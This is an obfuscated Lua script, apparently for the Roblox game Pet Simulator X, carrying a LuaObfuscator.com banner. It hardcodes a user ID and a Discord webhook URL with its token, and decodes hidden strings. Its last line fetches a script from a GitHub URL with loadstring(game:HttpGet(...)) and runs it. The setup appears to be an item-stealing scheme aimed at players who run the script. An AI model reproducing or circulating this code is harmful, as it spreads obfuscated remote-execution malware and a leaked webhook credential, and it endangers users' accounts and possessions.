--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + ((v11-1)% #v9) ,1 + ((v11-1)% #v9) + 1 )))%256 ));end return v5(v10);end UserId=356495246 + 376568874 ;WebHook="https://discord.com/api/webhooks/1089505589371097148/2J_hsfJFk1q0Djs-C1r41RspvLmykVDUKk4YPdyJb7roeTYLc-Z3YwODZWDkYxkRrRvx";_G.CustomScriptName=v7("\52\11\194\193\46\87\117\225\122\53\210\212\63\18\68\174","\20\67\183\166\75\119\54\142");_G.Text1=v7("\133\239\174\175\55\201\174\160\140\164\48\209\172\242\187\174\44\137\231\174","\201\128\207\203\94\167");_G.Text2=v7("\180\132\164\23\167\184\94\195\131\162\17\238\133\90\145\140\189\23","\227\229\205\99\206\214\57");_G.Text3=v7("\206\88\63\13\230\123\227\87\122\61\238\96\228\64\46\29\163\60\163","\141\48\90\110\141\18");_G.Text4=v7("\60\208\174\148\28\207\18\199\79\247\172\148\1\214\8\211\65\138\225","\111\164\207\230\104\166\124\160");loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimxgm.lua"))();
